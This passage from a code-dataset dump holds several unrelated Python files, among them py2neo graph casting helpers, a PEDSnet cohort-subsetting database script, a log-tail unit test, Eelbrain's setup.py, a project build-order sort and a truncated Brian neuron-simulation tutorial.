node(obj)\n elif isinstance(obj, tuple):\n return relationship(obj, entities)\n else:\n raise TypeError(obj)\n\n\ndef node(obj):\n if obj is None or isinstance(obj, (Node, NodeProxy)):\n return obj\n\n def apply(x):\n if isinstance(x, dict):\n inst.update(x)\n elif is_collection(x):\n for item in x:\n apply(item)\n elif isinstance(x, string):\n inst.add_label(ustr(x))\n else:\n raise TypeError(\"Cannot cast %s to Node\" % obj.__class__.__name__)\n\n inst = Node()\n apply(obj)\n return inst\n\n\ndef relationship(obj, entities=None):\n\n def get_type(r):\n if isinstance(r, string):\n return r\n elif hasattr(r, \"type\"):\n return r.type()\n elif isinstance(r, tuple) and len(r) == 2 and isinstance(r[0], string):\n return r[0]\n else:\n raise ValueError(\"Cannot determine relationship type from %r\" % r)\n\n def get_properties(r):\n if isinstance(r, string):\n return {}\n elif hasattr(r, \"type\") and callable(r.type):\n return dict(r)\n elif hasattr(r, \"properties\"):\n return r.properties\n elif isinstance(r, tuple) and len(r) == 2 and isinstance(r[0], string):\n return dict(r[1])\n else:\n raise ValueError(\"Cannot determine properties from %r\" % r)\n\n if isinstance(obj, Relationship):\n return obj\n elif isinstance(obj, tuple):\n if len(obj) == 3:\n start_node, t, end_node = obj\n properties = get_properties(t)\n elif len(obj) == 4:\n start_node, t, end_node, properties = obj\n properties = dict(get_properties(t), **properties)\n else:\n raise TypeError(\"Cannot cast relationship from {0}\".format(obj))\n else:\n raise TypeError(\"Cannot cast relationship from {0}\".format(obj))\n\n if entities:\n if isinstance(start_node, integer):\n start_node = entities[start_node]\n if isinstance(end_node, integer):\n end_node = entities[end_node]\n return Relationship(start_node, get_type(t), end_node, **properties)\n","sub_path":"py2neo/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":54665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"400562668","text":"import logging\nimport time\nfrom pedsnetdcc.db import StatementSet, Statement\nfrom pedsnetdcc.dict_logging import secs_since\nfrom pedsnetdcc.transform_runner import add_indexes, drop_unneeded_indexes\nfrom pedsnetdcc.transform_runner import add_foreign_keys\nfrom pedsnetdcc.transform_runner import add_primary_keys\nfrom pedsnetdcc.utils import (get_conn_info_dict, combine_dicts, check_stmt_err, vacuum,\n stock_metadata, conn_str_with_search_path)\nfrom pedsnetdcc.not_nulls import set_not_nulls\nfrom pedsnetdcc.concept_group_tables import create_index_replacement_tables\nfrom pedsnetdcc import VOCAB_TABLES\nALTER_OWNER_SQL = 'alter table {0}.{1} owner to dcc_owner;'\nGRANT_TABLE_SQL = 'grant select on table {0}.{1} to {2}'\n\n\ndef run_subset_by_cohort(conn_str, model_version, source_schema, target_schema, cohort_table,\n concept_create=False, drug_dose=False, measurement=False, covid_obs=False, inc_hash=False,\n index_create=False, fk_create=False, notable=False, nopk=False, nonull=False,\n limit=False, owner='loading_user', force=False):\n \"\"\"Create SQL for `select` statement transformations.\n\n The `search_path` only needs to contain the source schema; the target\n schema is embedded in the SQL statements.\n\n Returns a set of tuples of (sql_string, msg), where msg is a description\n for the operation to be carried out by the sql_string.\n\n :param model_version: PEDSnet model version, e.g. 2.3.0\n :param str source_schema: schema in which the tables are locaated\n :param str target_schema: schema in which to create the subset\n :param str cohort_table: name of table that contains the cohort\n :param bool concept_create: if True, create the concept group tables\n :param bool drug_dose: if True, copy drug dose tables\n :param bool measurement: if True, copy measurement tables\n :param bool covid_obs: if True, copy covid observation table\n :param bool inc_hash: if True, include hash_token table\n :param bool index_create: if True, create indexes\n :param bool fk_create: if True, create fks\n :param bool notable: if True, don't create tables\n :param bool nopk: if True, don't create primary keys\n :param bool nonull: if True, don't set column not null\n :param bool limit: if True, limit permissions to owner\n :param str owner: owner of the to grant permissions to\n :param bool force: if True, ignore benign errors\n :returns: True if the function succeeds\n :rtype: bool\n \"\"\"\n\n logger = logging.getLogger(__name__)\n log_dict = combine_dicts({'model_version': model_version, },\n get_conn_info_dict(conn_str))\n logger.info(combine_dicts({'msg': 'starting subset by cohort'},\n log_dict))\n start_time = time.time()\n\n metadata = stock_metadata(model_version)\n stmts = StatementSet()\n\n table_list = []\n select_all = (\n 'location',\n 'location_fips',\n 'care_site',\n 'provider',\n 'specialty',\n 'lab_site_mapping'\n )\n special_handling = {\n 'visit_payer',\n 'fact_relationship',\n 'location_history',\n 'hash_token'\n }\n measurement_tables = {\n 'measurement_bmi',\n 'measurement_bmiz',\n 'measurement_ht_z',\n 'measurement_wt_z'\n }\n create_dict = {}\n grant_vacuum_tables = []\n\n # Initial pass for tables that all rows are selected or are based on person_id in cohort table\n if not notable:\n for table_name,table in metadata.tables.items():\n if table_name in VOCAB_TABLES:\n continue\n if table_name in special_handling:\n continue\n\n table_list.append(table_name)\n create = 'create table ' + target_schema + '.' + table_name + ' as select t.*'\n #for column_name,column in table.c.items():\n # create += 't.' + column_name + ', '\n #create = create[:-2]\n create = create + ' from ' + source_schema + '.' + table_name + ' t'\n if table_name not in select_all:\n create = create + ' join ' + target_schema + '.' + cohort_table + ' c on c.person_id = t.person_id'\n create = create + ';'\n create_dict[table_name] = create\n grant_vacuum_tables.append(table_name)\n\n for table_name in sorted(table_list):\n create_stmt = Statement(create_dict[table_name])\n stmts.add(create_stmt)\n\n # Execute the statements in parallel.\n stmts.parallel_execute(conn_str)\n\n # Check for any errors and raise exception if they are found.\n for stmt in stmts:\n try:\n check_stmt_err(stmt, 'create initial tables')\n except:\n logger.error(combine_dicts({'msg': 'Fatal error',\n 'sql': stmt.sql,\n 'err': str(stmt.err)}, log_dict))\n logger.info(combine_dicts({'msg': 'create initial tables failed',\n 'elapsed': secs_since(start_time)},\n log_dict))\n raise\n logger.info({'msg': 'initial tables created'})\n\n # Create special handling tables\n del table_list[:]\n create_dict.clear()\n stmts.clear()\n\n for table_name,table in metadata.tables.items():\n if table_name in special_handling:\n table_list.append(table_name)\n create = 'create table ' + target_schema + '.' + table_name + ' as select t.*'\n #for column_name, column in table.c.items():\n # create += 't.' + column_name + ', '\n #create = create[:-2]\n create = create + ' from ' + source_schema + '.' + table_name + ' t'\n if table_name == 'fact_relationship':\n create = create + ' where exists(select 1 from ' + target_schema + '.visit_occurrence v'\n create = create + ' where t.domain_concept_id_1 = 8 and t.fact_id_1 = v.visit_occurrence_id)'\n create = create + ' or exists(select 1 from ' + target_schema + '.drug_exposure d'\n create = create + ' where t.domain_concept_id_1 = 13 and t.fact_id_1 = d.drug_exposure_id)'\n create = create + ' or exists(select 1 from ' + target_schema + '.measurement m'\n create = create + ' where t.domain_concept_id_1 = 21 and t.fact_id_1 = m.measurement_id)'\n create = create + ' or exists(select 1 from ' + target_schema + '.observation o'\n create = create + ' where t.domain_concept_id_1 = 27 and t.fact_id_1 = o.observation_id)'\n if table_name == 'location_history':\n create = create + ' join ' + target_schema + '.' + cohort_table + ' c on c.person_id = t.entity_id'\n if table_name == 'visit_payer':\n create = create + ' join ' + target_schema + '.visit_occurrence v on v.visit_occurrence_id = t.visit_occurrence_id'\n if table_name == 'hash_token':\n if inc_hash:\n create = create + ' join ' + target_schema + '.' + cohort_table + ' c on c.person_id = t.person_id'\n else:\n create = create + ' where FALSE'\n create = create + ';'\n create_dict[table_name] = create\n grant_vacuum_tables.append(table_name)\n\n for table_name in sorted(table_list):\n create_stmt = Statement(create_dict[table_name])\n stmts.add(create_stmt)\n\n # Execute the statements in parallel.\n stmts.parallel_execute(conn_str)\n\n # Check for any errors and raise exception if they are found.\n for stmt in stmts:\n try:\n check_stmt_err(stmt, 'create special handling tables')\n except:\n logger.error(combine_dicts({'msg': 'Fatal error',\n 'sql': stmt.sql,\n 'err': str(stmt.err)}, log_dict))\n logger.info(combine_dicts({'msg': 'create special handling tables failed',\n 'elapsed': secs_since(start_time)},\n log_dict))\n raise\n logger.info({'msg': 'special handling tables created'})\n stmts.clear()\n\n # Add drug dose tables\n if drug_dose:\n del table_list[:]\n create_dict.clear()\n stmts.clear()\n drug_dose_tables = ['drug_exposures_mgkg_derivations','drug_exposures_mgkg_metadata']\n for table_name in drug_dose_tables:\n table_list.append(table_name)\n create = 'create table ' + target_schema + '.' + table_name + ' as select t.*'\n create = create + ' from ' + source_schema + '.' + table_name + ' t'\n if table_name == 'drug_exposures_mgkg_derivations':\n create = create + ' join ' + target_schema + '.' + cohort_table + ' c on c.person_id = t.person_id'\n if table_name == 'drug_exposures_mgkg_metadata':\n create = create + ' join ' + target_schema + '.drug_exposure d on d.drug_exposure_id = t.drug_exposure_id'\n create = create + ';'\n create_dict[table_name] = create\n grant_vacuum_tables.append(table_name)\n\n for table_name in sorted(table_list):\n create_stmt = Statement(create_dict[table_name])\n stmts.add(create_stmt)\n\n # Execute the statements in parallel.\n stmts.parallel_execute(conn_str)\n\n # Check for any errors and raise exception if they are found.\n for stmt in stmts:\n try:\n check_stmt_err(stmt, 'create drug dose tables')\n except:\n logger.error(combine_dicts({'msg': 'Fatal error',\n 'sql': stmt.sql,\n 'err': str(stmt.err)}, log_dict))\n logger.info(combine_dicts({'msg': 'create drug dose tables failed',\n 'elapsed': secs_since(start_time)},\n log_dict))\n raise\n logger.info({'msg': 'drug dose tables created'})\n stmts.clear()\n\n # Add measurement tables\n if measurement:\n del table_list[:]\n create_dict.clear()\n stmts.clear()\n for table_name in measurement_tables:\n table_list.append(table_name)\n create = 'create table ' + target_schema + '.' + table_name + ' as select t.*'\n create = create + ' from ' + source_schema + '.' + table_name + ' t'\n create = create + ' join ' + target_schema + '.' + cohort_table + ' c on c.person_id = t.person_id'\n create = create + ';'\n create_dict[table_name] = create\n grant_vacuum_tables.append(table_name)\n\n for table_name in sorted(table_list):\n create_stmt = Statement(create_dict[table_name])\n stmts.add(create_stmt)\n\n # Execute the statements in parallel.\n stmts.parallel_execute(conn_str)\n\n # Check for any errors and raise exception if they are found.\n for stmt in stmts:\n try:\n check_stmt_err(stmt, 'create measurement tables')\n except:\n logger.error(combine_dicts({'msg': 'Fatal error',\n 'sql': stmt.sql,\n 'err': str(stmt.err)}, log_dict))\n logger.info(combine_dicts({'msg': 'create measurement tables failed',\n 'elapsed': secs_since(start_time)},\n log_dict))\n raise\n logger.info({'msg': 'measurement tables created'})\n stmts.clear()\n\n # Add COVID observation table\n if covid_obs:\n del table_list[:]\n create_dict.clear()\n stmts.clear()\n table_name = 'observation_derivation_covid'\n table_list.append(table_name)\n create = 'create table ' + target_schema + '.' + table_name + ' as select t.*'\n create = create + ' from ' + source_schema + '.' + table_name + ' t'\n create = create + ' join ' + target_schema + '.' + cohort_table + ' c on c.person_id = t.person_id'\n create = create + ';'\n create_dict[table_name] = create\n grant_vacuum_tables.append(table_name)\n\n for table_name in sorted(table_list):\n create_stmt = Statement(create_dict[table_name])\n stmts.add(create_stmt)\n\n # Execute the statements in parallel.\n stmts.parallel_execute(conn_str)\n\n # Check for any errors and raise exception if they are found.\n for stmt in stmts:\n try:\n check_stmt_err(stmt, 'create covid observation table')\n except:\n logger.error(combine_dicts({'msg': 'Fatal error',\n 'sql': stmt.sql,\n 'err': str(stmt.err)}, log_dict))\n logger.info(combine_dicts({'msg': 'create drug dose tables failed',\n 'elapsed': secs_since(start_time)},\n log_dict))\n raise\n logger.info({'msg': 'covid observation created'})\n stmts.clear()\n\n # Set up new connection string for manipulating the target schema\n new_search_path = ','.join((target_schema, 'vocabulary'))\n new_conn_str = conn_str_with_search_path(conn_str, new_search_path)\n\n if not nopk:\n # Add primary keys to the subset tables\n add_primary_keys(new_conn_str, model_version, force)\n\n if not nonull:\n # Add NOT NULL constraints to the subset tables (no force option)\n set_not_nulls(new_conn_str, model_version)\n\n if index_create:\n # Add indexes to the subset tables\n add_indexes(new_conn_str, model_version, force)\n\n # Drop unneeded indexes from the transformed tables\n drop_unneeded_indexes(new_conn_str, model_version, force)\n\n if fk_create:\n # Add constraints to the subset tables\n add_foreign_keys(new_conn_str, model_version, force)\n\n # Create concept index replacement tables normally done during merge.\n if concept_create:\n create_index_replacement_tables(new_conn_str, model_version)\n condition_tables = ['condition_occurrence_source_value', 'condition_occurrence_concept_name']\n drug_tables = ['drug_exposure_source_value','drug_exposure_concept_name']\n measurement_tables = ['measurement_source_value', 'measurement_concept_name']\n procedure_tables = ['procedure_occurrence_concept_name', 'procedure_occurrence_source_value']\n\n grant_vacuum_tables = grant_vacuum_tables + condition_tables + drug_tables + measurement_tables + procedure_tables\n\n # Grant permissions\n stmts.clear()\n logger.info({'msg': 'setting permissions'})\n if limit:\n users = (owner,)\n else:\n users = ('achilles_user', 'dqa_user', 'pcor_et_user', 'peds_staff', 'dcc_analytics')\n for target_table in grant_vacuum_tables:\n # alter_stmt = Statement(ALTER_OWNER_SQL.format(target_schema, target_table))\n # stmts.add(alter_stmt)\n for usr in users:\n grant_stmt = Statement(GRANT_TABLE_SQL.format(target_schema, target_table, usr))\n stmts.add(grant_stmt)\n\n # Check for any errors and raise exception if they are found.\n for stmt in stmts:\n try:\n stmt.execute(conn_str)\n check_stmt_err(stmt, 'grant permissions')\n except:\n logger.error(combine_dicts({'msg': 'Fatal error',\n 'sql': stmt.sql,\n 'err': str(stmt.err)}, log_dict))\n logger.info(combine_dicts({'msg': 'granting permissions failed',\n 'elapsed': secs_since(start_time)},\n log_dict))\n raise\n logger.info({'msg': 'permissions set'})\n\n # Vacuum analyze tables for piney freshness.\n vacuum(new_conn_str, model_version, analyze=True, tables=grant_vacuum_tables)\n\n # Log end of function.\n logger.info(combine_dicts({'msg': 'finished subset by cohort',\n 'elapsed': secs_since(start_time)}, log_dict))\n\n # If reached without error, then success!\n return True\n\n\ndef run_index_replace(conn_str, model_version):\n \"\"\"Create index replacement tables\n\n :param model_version: PEDSnet model version, e.g. 2.3.0\n :returns: True if the function succeeds\n :rtype: bool\n \"\"\"\n\n logger = logging.getLogger(__name__)\n log_dict = combine_dicts({'model_version': model_version, },\n get_conn_info_dict(conn_str))\n logger.info(combine_dicts({'msg': 'starting subset by cohort'},\n log_dict))\n start_time = time.time()\n\n metadata = stock_metadata(model_version)\n stmts = StatementSet()\n\n # Create concept index replacement tables normally done during merge.\n\n create_index_replacement_tables(conn_str, model_version)\n\n # Log end of function.\n logger.info(combine_dicts({'msg': 'finished subset by cohort',\n 'elapsed': secs_since(start_time)}, log_dict))\n\n # If reached without error, then success!\n return True\n","sub_path":"pedsnetdcc/subset_by_cohort.py","file_name":"subset_by_cohort.py","file_ext":"py","file_size_in_byte":18168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"407153789","text":"import os\n\n# function to get list of files in directory\ndef list_of_files(mypath):\n\tfrom os import listdir\n\tfrom os.path import isfile, join\n\tfiles = [f for f in listdir(mypath) if (isfile(join(mypath, f)) and (f.endswith(\".png.txt\") or f.endswith(\".png\")))]\n\n\treturn files\n\nfiles = list_of_files(os.getcwd()+'/screenshots')\nfor file in files:\n\n\tprint(file)\n\tpath = os.getcwd()+'/screenshots/'+file\n\tnew_path = os.getcwd()+'/screenshots/'+'night_'+file\n\n\tos.rename(path, new_path)\n\nfiles = list_of_files(os.getcwd()+'/data')\nfor file in files:\n\n\tprint(file)\n\tpath = os.getcwd()+'/data/'+file\n\tnew_path = os.getcwd()+'/data/'+'night_'+file\n\t\n\tos.rename(path, new_path)\n\n\n\t","sub_path":"Assets/night_image_renamer.py","file_name":"night_image_renamer.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"230596262","text":"import json\nimport collections\n\n# In all the string formats, we use the following placeholders:\n# {0} = indentation (tabs)\n# {1} = unqualified member or group name (simple identifier)\n# {2} = dotted member path, including the member's own name\n# {3} = underscored member path, including the member's own name\n# {4} = length of string in UTF-16 code units (not available for groups)\n# {5} = string data, as a string of comma-separated UTF-16 code units,\n# with a trailing zero (not available for groups)\nCONFIG = {\n 'INPUT_FILE': 'staticstrings.json',\n 'HEADER': {\n 'PLACEHOLDERS': {\n 'DATA_MEMBERS': '/*@DataMembers@*/',\n 'STRING_MEMBERS': '/*@StringMembers@*/',\n },\n 'FORMATS': {\n 'DATA_MEMBER': '{0}LitString<{4}> {3};',\n 'STRING_MEMBER': '{0}::String *{1};',\n 'GROUP_START': '{0}struct {1}Strings {{',\n 'GROUP_END': '{0}}} {1};',\n },\n 'TEMPLATE': 'staticstrings.template.h',\n 'OUTPUT': 'staticstrings.h',\n },\n 'SOURCE': {\n 'PLACEHOLDERS': {\n 'DATA_VALUES': '/*@StringData@*/',\n 'STRING_INITIALIZERS': '/*@StringInitializers@*/'\n },\n 'FORMATS': {\n 'DATA_VALUE': '{0}{{ {4}, 0, StringFlags::STATIC, {5} }},',\n 'STRING_INITIALIZER': '{0}this->{2} = reinterpret_cast(&data->{3});',\n },\n 'TEMPLATE': 'staticstrings.template.cpp',\n 'OUTPUT': 'staticstrings.cpp',\n },\n}\n\ndef generate_files(config):\n string_data = _parse_json(config['INPUT_FILE'])\n header_config = config['HEADER']\n source_config = config['SOURCE']\n\n members = init_members(string_data)\n\n header_template = _read_all_text(header_config['TEMPLATE'])\n formatted_header = format_header(\n header_template,\n members,\n header_config['PLACEHOLDERS'],\n header_config['FORMATS']\n )\n\n source_template = _read_all_text(source_config['TEMPLATE'])\n formatted_source = format_source(\n source_template,\n members,\n source_config['PLACEHOLDERS'],\n source_config['FORMATS']\n )\n\n _write_all_text(header_config['OUTPUT'], formatted_header)\n _write_all_text(source_config['OUTPUT'], formatted_source)\n\nclass MemberDefinition:\n def __init__(self, path, name):\n self.path = path\n self.name = name\n\n def dotted_path(self):\n return self.joined_path('.')\n\n def underscored_path(self):\n return self.joined_path('_')\n\n def joined_path(self, sep):\n return sep.join(self.path + (self.name,))\n\nclass GroupDefinition(MemberDefinition):\n def __init__(self, path, name, children):\n super(GroupDefinition, self).__init__(path, name)\n self.group = True\n self.children = children\n self._format_args = None\n\n def __iter__(self):\n yield from self.children\n\n def format_args(self):\n if self._format_args is None:\n self._format_args = (self.name, self.dotted_path(), self.underscored_path())\n return self._format_args\n\nclass StringDefinition(MemberDefinition):\n def __init__(self, path, name, value):\n super(StringDefinition, self).__init__(path, name)\n self.group = False\n self.value = value\n self._format_args = None\n\n def format_args(self):\n if self._format_args is None:\n utf16 = self.to_utf16()\n self._format_args = (\n self.name,\n self.dotted_path(),\n self.underscored_path(),\n len(utf16),\n ','.join(map(str, utf16 + [0]))\n )\n return self._format_args\n\n def to_utf16(self):\n utf16_bytes = self.value.encode('utf-16le');\n code_units = []\n for i in range(0, len(utf16_bytes), 2):\n code_units.append(utf16_bytes[i] + (utf16_bytes[i + 1] << 8))\n return code_units\n\ndef init_members(string_data):\n def get_members(path, entries):\n members = []\n\n for k, v in entries.items():\n if isinstance(v, dict):\n group_children = get_members(path + (k,), v)\n member = GroupDefinition(path, k, group_children)\n else:\n member = StringDefinition(path, k, v)\n members.append(member)\n\n return members\n\n return get_members((), string_data)\n\ndef _iter_flattened(members):\n for m in members:\n if m.group:\n yield from _iter_flattened(m.children)\n else:\n yield m\n\ndef format_header(template, members, placeholders, formats):\n data_members = []\n string_members = []\n data_member_format = formats['DATA_MEMBER']\n string_member_format = formats['STRING_MEMBER']\n group_start_format = formats['GROUP_START']\n group_end_format = formats['GROUP_END']\n\n # Data members\n for member in _iter_flattened(members):\n format_args = ('\\t',) + member.format_args()\n data_members.append(data_member_format.format(*format_args))\n\n # String members\n def format_string_member(member, indent):\n format_args = (indent,) + member.format_args()\n if member.group:\n string_members.append(group_start_format.format(*format_args))\n for m in member:\n format_string_member(m, '\\t' + indent)\n string_members.append(group_end_format.format(*format_args))\n else:\n string_members.append(string_member_format.format(*format_args))\n\n for member in members:\n format_string_member(member, '\\t')\n\n template = template.replace(placeholders['DATA_MEMBERS'], '\\n'.join(data_members))\n template = template.replace(placeholders['STRING_MEMBERS'], '\\n'.join(string_members))\n\n return template\n\ndef format_source(template, members, placeholders, formats):\n data_values = []\n string_initers = []\n\n data_value_format = formats['DATA_VALUE']\n string_initer_format = formats['STRING_INITIALIZER']\n\n for member in _iter_flattened(members):\n format_args = ('\\t',) + member.format_args()\n data_values.append(data_value_format.format(*format_args))\n string_initers.append(string_initer_format.format(*format_args))\n\n template = template.replace(placeholders['DATA_VALUES'], '\\n'.join(data_values))\n template = template.replace(placeholders['STRING_INITIALIZERS'], '\\n'.join(string_initers))\n\n return template\n\ndef _parse_json(filename):\n with open(filename, encoding='utf-8') as f:\n # We need to order the keys so that the data values are guaranteed\n # to correspond to the data member order, otherwise you get all kinds\n # of fun problems. Hence: OrderedDict!\n result = json.load(f, object_pairs_hook=collections.OrderedDict)\n return result\n\ndef _read_all_text(filename):\n with open(filename, encoding='utf-8') as f:\n file_text = f.read()\n return file_text\n\ndef _write_all_text(filename, text):\n with open(filename, mode='w', encoding='utf-8', newline='') as f:\n f.write(text)\n\nif __name__ == '__main__':\n generate_files(CONFIG);\n","sub_path":"ovum-vm/src/res/staticstrings.py","file_name":"staticstrings.py","file_ext":"py","file_size_in_byte":6565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"229741332","text":"# -*- coding: utf-8 -*-\nimport os\n\nfrom hamcrest import *\n\nfrom test.base import BaseTestCase\nfrom amplify.agent.util.tail import FileTail\n\n__author__ = \"Mike Belov\"\n__copyright__ = \"Copyright (C) 2015, Nginx Inc. All rights reserved.\"\n__credits__ = [\"Mike Belov\", \"Andrei Belov\", \"Ivan Poluyanov\", \"Oleg Mamontov\", \"Andrew Alexeev\"]\n__license__ = \"\"\n__maintainer__ = \"Mike Belov\"\n__email__ = \"dedm@nginx.com\"\n\n\nclass TailTestCase(BaseTestCase):\n test_log = 'log/something.log'\n test_log_rotated = 'log/something.log.rotated'\n\n def setup_method(self, method):\n # write something to create file\n self.write_log('start')\n\n def write_log(self, line):\n os.system('echo %s >> %s' % (line, self.test_log))\n \"\"\"\n with open(self.test_log, 'a+') as f:\n print 'writing \"%s\" to %s' % (line, f.name)\n f.writelines([line])\n \"\"\"\n\n def teardown_method(self, method):\n # remove test log\n for filename in (self.test_log, self.test_log_rotated):\n if os.path.exists(filename):\n os.remove(filename)\n\n super(TailTestCase, self).teardown_method(method)\n\n def test_read_new_lines(self):\n tail = FileTail(filename=self.test_log)\n\n # write messages and read them\n for i in xrange(10):\n line = \"this is %s line\" % i\n self.write_log(line)\n new_lines = tail.readlines()\n assert_that(new_lines, has_length(1))\n assert_that(new_lines.pop(), equal_to(line))\n\n def test_rotate(self):\n tail = FileTail(filename=self.test_log)\n\n # rotate it\n os.rename(self.test_log, self.test_log_rotated)\n\n # write something in a new one\n self.write_log(\"from a new file\")\n\n # read tail and get two lines\n new_lines = tail.readlines()\n assert_that(new_lines, has_length(1))\n assert_that(new_lines, equal_to(['from a new file']))\n\n def test_lose_changes_while_rotate(self):\n tail = FileTail(filename=self.test_log)\n\n # write something\n self.write_log(\"from the old file\")\n\n # rotate it\n os.rename(self.test_log, self.test_log_rotated)\n\n # write something in a new one\n self.write_log(\"from a new file\")\n\n # read tail and get two lines\n new_lines = tail.readlines()\n assert_that(new_lines, has_length(1))\n assert_that(new_lines, equal_to(['from a new file']))\n\n def test_no_new_lines(self):\n # check one new line\n tail = FileTail(filename=self.test_log)\n self.write_log('something')\n new_lines = tail.readlines()\n assert_that(new_lines, has_length(1))\n\n # check no new lines\n new_lines = tail.readlines()\n assert_that(new_lines, has_length(0))\n\n # and check again one new line\n tail = FileTail(filename=self.test_log)\n self.write_log('something')\n new_lines = tail.readlines()\n assert_that(new_lines, has_length(1))\n","sub_path":"test/unit/agent/util/tail.py","file_name":"tail.py","file_ext":"py","file_size_in_byte":3010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"240733565","text":"from more_itertools import ilen\n\nfrom my.league import history\nfrom my.steam import games, achievements\n\n\ndef test_league() -> None:\n gs = list(history())\n assert len(gs) > 50\n assert len(gs[0].players) == 10\n\n\ndef test_steam() -> None:\n assert ilen(games()) > 10\n ach = list(achievements())\n assert any([a.game_name == \"Counter-Strike: Global Offensive\" for a in ach])\n","sub_path":"tests/test_games.py","file_name":"test_games.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"347268955","text":"\"\"\"\nsetup.py\n========\n\nThis is the setup.py script for Eelbrain.\n\nhttp://docs.python.org/distutils/index.html\n\n\"\"\"\n# Setuptools bootstrap module\n# http://pythonhosted.org//setuptools/setuptools.html\nfrom ez_setup import use_setuptools\nuse_setuptools('17')\n\nfrom distutils.version import StrictVersion\nimport re\nimport sys\nfrom setuptools import setup, find_packages, Extension\nimport numpy as np\n\n\nDESC = \"\"\"\nGitHub: https://github.com/christianbrodbeck/Eelbrain\n\"\"\"\n\n# version must be in X.X.X format, e.g., \"0.0.3dev\"\nwith open('eelbrain/__init__.py') as fid:\n text = fid.read()\nmatch = re.search(\"__version__ = '([.\\w]+)'\", text)\nif match is None:\n raise ValueError(\"No valid version string found in:\\n\\n\" + text)\nversion = match.group(1)\nif version != 'dev':\n s = StrictVersion(version) # check that it's a valid version\n\nif len(sys.argv) > 1:\n arg = sys.argv[1]\nelse:\n arg = None\n\n# Cython extensions\next = [\n Extension(\"eelbrain._stats.opt\", [\"eelbrain/_stats/opt.c\"]),\n Extension(\"eelbrain._stats.error_functions\",\n [\"eelbrain/_stats/error_functions.c\"])\n]\n\n# basic setup arguments\nkwargs = dict(name='eelbrain',\n version=version,\n description=\"MEG/EEG analysis tools\",\n url=\"http://eelbrain.readthedocs.io\",\n author=\"Christian Brodbeck\",\n author_email='christianbrodbeck@nyu.edu',\n license='GPL3',\n long_description=DESC,\n install_requires=['keyring >= 5',\n 'tex >= 1.8',\n 'mne >= 0.13.1',\n 'nibabel >= 2.0',\n 'tqdm >= 4.8',\n 'colormath >= 2.1'],\n extras_require={'full': ['numpy >= 1.8',\n 'scipy >= 0.16.0',\n 'matplotlib >= 1.1'],\n 'dev': ['cython >= 0.21',\n 'sphinx >= 1.1',\n 'numpydoc >= 0.5'],\n 'plot.brain': ['pysurfer[save_movie] >= 0.7']},\n include_dirs=[np.get_include()],\n packages=find_packages(),\n ext_modules=ext,\n )\n\n# Either PIL or Pillow is fine...\ntry:\n import PIL\nexcept ImportError:\n kwargs['install_requires'].append('pillow')\n\nsetup(**kwargs)\n\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"609717595","text":"class Project:\n def __init__(self, name):\n self.name = name\n self.incoming_edges = 0\n self.children = []\n self.map = {}\n\n def add_neighbor(self, node):\n if node.name not in self.map:\n self.children.append(node)\n self.map[node.name] = node\n node.incoming_edges += 1\n\n def __repr__(self):\n return self.name\n\n\nclass Graph:\n def __init__(self):\n self.nodes = []\n self.map = {}\n\n def get_or_create_node(self, name):\n if name not in self.map:\n node = Project(name)\n self.nodes.append(node)\n self.map[name] = node\n\n return self.map[name]\n\n def add_edge(self, start_name, end_name):\n start = self.get_or_create_node(start_name)\n end = self.get_or_create_node(end_name)\n start.add_neighbor(end)\n\n\ndef add_non_dependent(order_array, projects, offset):\n for p in projects:\n if p.incoming_edges == 0:\n order_array[offset] = p\n offset += 1\n return offset\n\n\ndef build_graph(projects, dependencies):\n graph = Graph()\n\n for p in projects:\n graph.get_or_create_node(p)\n\n for d in dependencies:\n graph.add_edge(d[0], d[1])\n return graph\n\n\ndef order_projects(projects):\n order_array = [None] * len(projects)\n\n end_of_list = add_non_dependent(order_array, projects, 0)\n\n to_be_processed = 0\n while to_be_processed < len(order_array):\n current = order_array[to_be_processed]\n\n # Dependency cycle\n if current is None:\n return None\n\n for c in current.children:\n c.incoming_edges -= 1\n\n end_of_list = add_non_dependent(order_array, current.children, end_of_list)\n to_be_processed += 1\n\n return order_array\n\n\nif __name__ == '__main__':\n my_projects = ['a', 'b', 'c', 'd', 'e', 'f']\n my_deps = [('a', 'd'), ('f', 'b'), ('b', 'd'), ('f', 'a'), ('d', 'c')]\n\n g = build_graph(my_projects, my_deps)\n print(order_projects(g.nodes))\n","sub_path":"chapter_4/7_build_order/remove_edges.py","file_name":"remove_edges.py","file_ext":"py","file_size_in_byte":2028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"89986356","text":"'''\r\n\r\nIntroduction to Brian part 2: Synapses\r\n\r\nhttps://github.com/brian-team/brian2/blob/master/tutorials/2-intro-to-brian-synapses.ipynb\r\nSimulating spikes using Brian\r\n\r\n\r\n'''\r\n\r\nimport numpy as np\r\nimport math\r\nimport matplotlib.pyplot as plt\r\nfrom brian2 import *\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n \r\n # Define the neuron equation\r\n eqs = '''\r\n\r\n dv/dt = (I - v)/tau : 1\r\n I : 1\r\n tau : second\r\n\r\n '''\r\n\r\n num_neurons = 3\r\n\r\n # Define the neurongroup\r\n G = NeuronGroup(num_neurons ,\r\n eqs ,\r\n threshold = 'v>1',\r\n reset = 'v = 0',\r\n method = 'exact')\r\n\r\n # Define the Input for each neuron\r\n # We have 3 here\r\n G.I = [2 , 0 , 0]\r\n\r\n # Define time\r\n G.tau = [10 , 100 , 100] * ms\r\n\r\n\r\n # Define synapses\r\n S = Synapses(G , G , 'w : 1' , on_pre = 'v_post += w')\r\n S.connect(i = 0 , j = [1 , 2])\r\n S.w = 'j * 0.2'\r\n S.delay = 'j * 2 * ms'\r\n\r\n M = StateMonitor(G , 'v' , record = True)\r\n\r\n run(100 * ms)\r\n\r\n\r\n plt.plot(M.t/ms , M.v[0] 